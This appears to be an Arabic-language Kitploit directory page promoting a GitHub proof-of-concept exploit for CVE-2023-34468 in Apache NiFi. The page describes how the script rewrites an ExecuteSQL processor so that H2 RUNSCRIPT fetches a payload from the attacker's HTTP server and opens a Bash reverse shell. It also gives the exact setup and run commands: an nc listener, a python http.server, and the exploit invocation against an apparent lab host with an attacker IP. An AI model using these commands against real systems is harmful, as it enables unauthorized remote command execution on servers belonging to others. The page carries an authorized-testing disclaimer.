Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-34468 — CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC | Kitploit
أدوات/GitHubGitHub/ozcanpng/cve-2023-34468
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubozcanpng/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

عرض المستودع
3منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-34468 — Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

إثبات مفهوم قصير بلغة Python لإساءة استخدام معالج Apache NiFi ExecuteSQL القابل للتحرير باستخدام حمولة H2 RUNSCRIPT لتشغيل تنفيذ الأوامر عن بعد عبر غلاف عكسي Bash.

للاستخدام المصرح به للاختبار والبحث فقط. لا تستخدم ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


ما يفعله

root@kitploit:~
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
  1. يكتشف معالج ExecuteSQL واحد تلقائيًا، أو يقبل --processor-id يدويًا.
  2. يكتب حمولة محلية rce.sql تحدد وتستدعي اسمًا مستعارًا لتنفيذ الغلاف المدعوم بـ Java.
  3. يطلب منك تشغيل مستمع nc وخادم HTTP الخاصين بك.
  4. يحدّث استعلام المعالج لجلب rce.sql عبر H2 RUNSCRIPT.
  5. يبدأ المعالج لتشغيل الغلاف العكسي.
تنزيل الأداة
  • يستعيد تكوين المعالج الأصلي بعد تأكيد وصول الغلاف.

  • لقطات الشاشة

    1. الإعداد

    الإعداد

    2. الطلب إلى الحمولة

    تشغيل الاستغلال

    3. تم استلام الغلاف

    تحديث المعالج

    4. النتيجة

    النتيجة


    الإعداد

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2023-34468.git
    cd CVE-2023-34468
    python3 -m venv .venv
    source .venv/bin/activate
    pip install -r requirements.txt
    

    الاستخدام

    الطرفية 1:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    الطرفية 2، من دليل هذا المستودع:

    root@kitploit:~
    python3 -m http.server 8000
    

    الطرفية 3:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
    

    لاختيار المعالج يدويًا:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
    

    المتأثر

    المنتجالإصدار المتأثرالوصول المطلوبالتأثير
    Apache NiFiالتوزيعات المتأثرة بـ CVE-2023-34468 باستخدام سلوك ExecuteSQL/H2 القابل للتحريرالقدرة على الوصول إلى معالج NiFi الهدف وتعديله عبر APIتنفيذ الأوامر عن بعد

    ملاحظات

    • يفترض البرنامج النصي أن واجهة برمجة تطبيقات NiFi قابلة للوصول وأن المستخدم/الجلسة الحالي يمكنه تعديل المعالج الهدف.
    • يتم تجاهل ملف rce.sql المُنشأ بواسطة git ويجب تقديمه من دليل المستودع باستخدام python3 -m http.server.
    • إذا لم يعثر الاكتشاف التلقائي على معالج أو وجد مرشحين متعددين، فقم بتمرير UUID المعالج يدويًا باستخدام --processor-id.
    • يحاول البرنامج النصي استعادة تكوين معالج ExecuteSQL الأصلي بعد تأكيد وصول الغلاف.

    المراجع

    • NVD — CVE-2023-34468
    • Apache NiFi
    • أوامر قاعدة بيانات H2

    المؤلف

    ozcanpng — github.com/ozcanpng — ozcanpng.dev